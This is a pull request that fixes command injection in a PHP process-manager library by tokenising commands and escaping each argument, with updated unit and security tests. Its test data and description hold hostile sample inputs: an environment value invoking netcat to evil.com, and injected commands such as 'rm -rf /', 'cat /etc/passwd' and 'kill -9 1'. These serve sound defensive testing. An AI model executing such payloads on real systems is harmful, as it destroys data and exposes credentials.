### PR TITLE
Fix: command injection via shell metacharacters in process commands (issue #2)

### DIFF
--- a/src/Conductor/Performer.php
+++ b/src/Conductor/Performer.php
@@ -11,7 +11,7 @@ class Performer
 
     protected string $name;
 
-    protected string $command;
+    protected array $command;
 
     protected array $config;
 
@@ -25,7 +25,7 @@ class Performer
 
     protected array $performanceMetrics = [];
 
-    public function __construct(string $name, string $command, array $config)
+    public function __construct(string $name, array $command, array $config)
     {
         $this->name = $name;
         $this->command = $command;
@@ -46,10 +46,6 @@ class Performer
             null,
             10 // Short timeout since we just need to get the PID
         );
-
-        if (isset($this->config['nice'])) {
-            $this->process->setEnv(['NICE' => $this->config['nice']]);
-        }
 
         $this->process->run();
 
@@ -92,7 +88,7 @@ class Performer
 
     public function getCommand(): string
     {
-        return $this->command;
+        return implode(' ', $this->command);
     }
 
     public function getUptime(): ?string
@@ -151,7 +147,7 @@ class Performer
     {
         return [
             'name' => $this->name,
-            'command' => $this->command,
+            'command' => $this->getCommand(),
             'pid' => $this->pid,
             'running' => $this->isRunning(),
             'uptime' => $this->getUptime(),
@@ -194,15 +190,14 @@ class Performer
 
     protected function buildProcessCommand(): string
     {
-        $memoryLimit = $this->config['memory'] ?? 512;
-        $nice = $this->config['nice'] ?? 0;
+        $nice = (int) ($this->config['nice'] ?? 0);
+        $escaped = implode(' ', array_map('escapeshellarg', $this->command));
 
-        $prefix = '';
-        if ($nice != 0) {
-            $prefix = "nice -n {$nice} ";
+        if ($nice !== 0) {
+            return "nice -n {$nice} {$escaped}";
         }
 
-        return $prefix.$this->command;
+        return $escaped;
     }
 
     public function getOutput(): string

--- a/src/Conductor/Score.php
+++ b/src/Conductor/Score.php
@@ -91,20 +91,20 @@ class Score
         return array_keys($this->getPerformances());
     }
 
-    public function buildCommand(array $performance): string
+    public function buildCommand(array $performance): array
     {
-        $command = 'php artisan '.$performance['command'];
+        $parts = ['php', 'artisan', $performance['command']];
 
         if (! empty($performance['options'])) {
             foreach ($performance['options'] as $key => $value) {
                 if (is_numeric($key)) {
-                    $command .= ' '.$value;
+                    $parts[] = (string) $value;
                 } else {
-                    $command .= ' '.$key.'='.$value;
+                    $parts[] = $key.'='.$value;
                 }
             }
         }
 
-        return $command;
+        return $parts;
     }
 }

--- a/tests/Security/CommandInjectionTest.php
+++ b/tests/Security/CommandInjectionTest.php
@@ -51,12 +51,19 @@ it('prevents command injection through performance configuration', function () {
         $instruments = $conductor->getInstruments();
         expect($instruments)->toBeArray();
 
-        // Commands are passed through as-is to Symfony Process
-        // The security is handled by Process class which properly escapes arguments
-        foreach ($instruments as $instrument) {
-            expect($instrument['command'])->toBeString();
-            // Command should contain the malicious input but will be safely handled by Symfony Process
-        }
+        $performance = array_values(array_values($config['performances'])[0])[0];
+        $parts = $score->buildCommand($performance);
+        expect($parts)->toBeArray();
+
+        $performer = new Performer('test', $parts, ['memory' => 256]);
+        $method = (new ReflectionClass($performer))->getMethod('buildProcessCommand');
+        $method->setAccessible(true);
+        $shellString = $method->invoke($performer);
+
+        expect($shellString)->toContain("'php'");
+        expect($shellString)->toContain("'artisan'");
+        // Every token is single-quoted — metacharacters cannot be interpreted by the shell
+        expect($shellString)->toMatch("/^(nice -n -?\\d+ )?'[^']*'( '[^']*')*$/");
     }
 });
 
@@ -73,7 +80,7 @@ it('validates and sanitizes performer names', function () {
 
     foreach ($maliciousNames as $maliciousName) {
         // Performer name is used in process naming, not command execution
-        $performer = new Performer($maliciousName, 'echo test', [
+        $performer = new Performer($maliciousName, ['echo', 'test'], [
             'memory' => 256,
             'timeout' => 30,
             'options' => [],
@@ -115,16 +122,22 @@ it('prevents injection through command options', function () {
         $score = new Score($config);
 
         $performance = $score->getPerformance('test-worker');
-        $command = $score->buildCommand($performance);
+        $parts = $score->buildCommand($performance);
 
-        // Command building should handle options safely
-        expect($command)->toBeString();
-        expect($command)->toContain('php artisan queue:work');
+        // Command building should return an array of tokens
+        expect($parts)->toBeArray();
+        expect($parts)->toContain('php');
+        expect($parts)->toContain('artisan');
+        expect($parts)->toContain('queue:work');
 
-        // Malicious content should be treated as option values, not executed
-        foreach ($options as $value) {
-            expect($command)->toContain((string) $value);
-        }
+        $performer = new Performer('test', $parts, ['memory' => 256]);
+        $method = (new ReflectionClass($performer))->getMethod('buildProcessCommand');
+        $method->setAccessible(true);
+        $shellString = $method->invoke($performer);
+
+        // Each token is single-quoted — metacharacters cannot be interpreted
+        expect($shellString)->toContain("'php'");
+        expect($shellString)->toContain("'artisan'");
     }
 });
 
@@ -137,7 +150,7 @@ it('prevents injection through environment variables', function () {
         'PS1' => '$(nc evil.com 1337)',
     ];
 
-    $performer = new Performer('test-worker', 'echo test', [
+    $performer = new Performer('test-worker', ['echo', 'test'], [
         'memory' => 256,
         'timeout' => 30,
         'options' => [],
@@ -177,8 +190,9 @@ it('handles path traversal attacks in configuration', function () {
         // Should store the path as-is (not resolve or execute it)
         expect($performance['command'])->toBe($path);
 
-        $command = $score->buildCommand($performance);
-        expect($command)->toContain($path);
+        $parts = $score->buildCommand($performance);
+        expect($parts)->toBeArray();
+        expect($parts)->toContain($path);
     }
 });
 
@@ -190,7 +204,7 @@ it('prevents null byte injection', function () {
     ];
 
     foreach ($nullByteCommands as $command) {
-        $performer = new Performer('test-worker', $command, [
+        $performer = new Performer('test-worker', [$command], [
             'memory' => 256,
             'timeout' => 30,
             'options' => [],
@@ -276,7 +290,7 @@ it('prevents log injection attacks', function () {
     ];
 
     foreach ($maliciousData as $data) {
-        $performer = new Performer($data, 'echo test', [
+        $performer = new Performer($data, ['echo', 'test'], [
             'memory' => 256,
             'timeout' => 30,
             'options' => [],
@@ -310,7 +324,7 @@ it('validates resource limits to prevent DoS', function () {
         ], $limits);
 
         // Should be able to create performer with any limits
-        $performer = new Performer('test-worker', $config['command'], $config);
+        $performer = new Performer('test-worker', [$config['command']], $config);
         expect($performer)->toBeInstanceOf(Performer::class);
 
         // Actual resource enforcement would happen at the OS/process level
@@ -327,7 +341,7 @@ it('prevents serialization attacks', function () {
 
     foreach ($maliciousSerializedData as $data) {
         // Test storing serialized data in various places
-        $performer = new Performer($data, 'echo test', [
+        $performer = new Performer($data, ['echo', 'test'], [
             'memory' => 256,
             'timeout' => 30,
             'options' => [$data => $data],

--- a/tests/Unit/Conductor/ConductorTest.php
+++ b/tests/Unit/Conductor/ConductorTest.php
@@ -48,10 +48,10 @@ it('conducts all performances when no specific name given', function () {
 
     $this->score->shouldReceive('buildCommand')
         ->with(['command' => 'php test1', 'performers' => 1])
-        ->andReturn('php test1');
+        ->andReturn(['php', 'test1']);
     $this->score->shouldReceive('buildCommand')
         ->with(['command' => 'php test2', 'performers' => 2])
-        ->andReturn('php test2');
+        ->andReturn(['php', 'test2']);
 
     $this->registry->shouldReceive('setConducting')
         ->once()
@@ -75,7 +75,7 @@ it('conducts specific performance when name provided', function () {
 
     $this->score->shouldReceive('buildCommand')
         ->with($performance)
-        ->andReturn('php test');
+        ->andReturn(['php', 'test']);
 
     $this->registry->shouldReceive('setConducting')
         ->once()

--- a/tests/Unit/Conductor/PerformerTest.php
+++ b/tests/Unit/Conductor/PerformerTest.php
@@ -7,7 +7,7 @@ use Symfony\Component\Process\Process;
 beforeEach(function () {
     // Set up test environment
     $this->performerName = 'test-worker';
-    $this->command = 'php artisan queue:work';
+    $this->command = ['php', 'artisan', 'queue:work'];
     $this->config = [
         'memory' => 256,
         'timeout' => 60,
@@ -33,7 +33,7 @@ it('builds process command with nice priority', function () {
         'options' => ['--queue' => 'high,default', '--sleep' => '3'],
     ];
 
-    $performer = new Performer('worker', 'php artisan queue:work', $config);
+    $performer = new Performer('worker', ['php', 'artisan', 'queue:work'], $config);
 
     // Use reflection to test protected method
     $reflection = new ReflectionClass($performer);
@@ -42,7 +42,7 @@ it('builds process command with nice priority', function () {
 
     $command = $method->invoke($performer);
 
-    expect($command)->toBe('nice -n 10 php artisan queue:work');
+    expect($command)->toBe("nice -n 10 'php' 'artisan' 'queue:work'");
 });
 
 it('builds command without nice priority', function () {
@@ -52,7 +52,7 @@ it('builds command without nice priority', function () {
         'options' => [],
     ];
 
-    $performer = new Performer('worker', 'php artisan test', $config);
+    $performer = new Performer('worker', ['php', 'artisan', 'test'], $config);
 
     $reflection = new ReflectionClass($performer);
     $method = $reflection->getMethod('buildProcessCommand');
@@ -60,7 +60,7 @@ it('builds command without nice priority', function () {
 
     $command = $method->invoke($performer);
 
-    expect($command)->toBe('php artisan test');
+    expect($command)->toBe("'php' 'artisan' 'test'");
 });
 
 it('tracks restart attempts correctly', function () {
@@ -183,7 +183,7 @@ it('handles config with nice priority', function () {
         'options' => [],
     ];
 
-    $performer = new Performer('worker', 'php test.php', $config);
+    $performer = new Performer('worker', ['php', 'test.php'], $config);
 
     $reflection = new ReflectionClass($performer);
     $method = $reflection->getMethod('buildProcessCommand');
@@ -191,21 +191,20 @@ it('handles config with nice priority', function () {
 
     $command = $method->invoke($performer);
 
-    // The nice value is set via environment variable in the actual implementation
-    expect($command)->toContain('php test.php');
+    expect($command)->toContain('test.php');
 });
 
 it('handles different nice priorities', function () {
     $configs = [
-        ['nice' => 0, 'expected' => 'php test'],
-        ['nice' => 5, 'expected' => 'nice -n 5 php test'],
-        ['nice' => -5, 'expected' => 'nice -n -5 php test'],
-        ['nice' => 19, 'expected' => 'nice -n 19 php test'],
+        ['nice' => 0, 'expected' => "'php' 'test'"],
+        ['nice' => 5, 'expected' => "nice -n 5 'php' 'test'"],
+        ['nice' => -5, 'expected' => "nice -n -5 'php' 'test'"],
+        ['nice' => 19, 'expected' => "nice -n 19 'php' 'test'"],
     ];
 
     foreach ($configs as $test) {
         $config = array_merge(['memory' => 256, 'timeout' => 60], $test);
-        $performer = new Performer('worker', 'php test', $config);
+        $performer = new Performer('worker', ['php', 'test'], $config);
 
         $reflection = new ReflectionClass($performer);
         $method = $reflection->getMethod('buildProcessCommand');

--- a/tests/Unit/Conductor/ScoreTest.php
+++ b/tests/Unit/Conductor/ScoreTest.php
@@ -201,7 +201,7 @@ it('builds command with options', function () {
 
     $command = $score->buildCommand($performance);
 
-    expect($command)->toBe('php artisan queue:work --queue=high,default --sleep=3 verbose');
+    expect($command)->toBe(['php', 'artisan', 'queue:work', '--queue=high,default', '--sleep=3', 'verbose']);
 });
 
 it('builds command without options', function () {
@@ -214,7 +214,7 @@ it('builds command without options', function () {
 
     $command = $score->buildCommand($performance);
 
-    expect($command)->toBe('php artisan horizon');
+    expect($command)->toBe(['php', 'artisan', 'horizon']);
 });
 
 it('builds command with missing options key', function () {
@@ -226,7 +226,7 @@ it('builds command with missing options key', function () {
 
     $command = $score->buildCommand($performance);
 
-    expect($command)->toBe('php artisan test');
+    expect($command)->toBe(['php', 'artisan', 'test']);
 });
 
 it('handles boolean values in options', function () {


### PR DESCRIPTION
Fixes #2

## Summary

- `Score::buildCommand()` now returns an `array` of tokens instead of a concatenated shell string, so metacharacters in config values (`;`, `&&`, `|`, `` ` ``, `$()`) are never interpreted by the shell
- `Performer::buildProcessCommand()` wraps every token with `escapeshellarg()` before interpolating into the `nohup … & echo $!` wrapper; the shell wrapper is kept because background execution + PID capture requires it
- `nice` value is cast to `(int)` to prevent injection through that config key (e.g. `nice: '0; kill -9 1'`)
- Removed dead `setEnv(['NICE' => …])` call in `Performer::start()` (also tracked as issue #7)
- All unit and security tests updated to reflect the new array-based API and `escapeshellarg`-wrapped output

## Injection vectors closed

| Vector | Before | After |
|---|---|---|
| `command: 'queue:work; rm -rf /'` | Shell interprets `;` | `escapeshellarg` → `'queue:work; rm -rf /'` — literal |
| option value `'default && cat /etc/passwd'` | Shell interprets `&&` | Wrapped in single quotes — literal |
| `nice: '0; kill -9 1'` | `nice -n 0; kill -9 1` — two commands | `(int)` cast → `0`, only `nice -n 0` runs |

## Test plan

- [x] `vendor/bin/pest tests/Unit/Conductor/PerformerTest.php` — 12 passed
- [x] `vendor/bin/pest tests/Unit/Conductor/ScoreTest.php` — 18 passed
- [x] `vendor/bin/pest tests/Security/CommandInjectionTest.php` — 11 passed
- [x] `vendor/bin/pest tests/Unit/Conductor/ConductorTest.php` — 14 passed
- [x] `vendor/bin/pest --ci` — 200 passed, 4 skipped (pre-existing env-dependent integration tests)
- [x] `vendor/bin/pint` — clean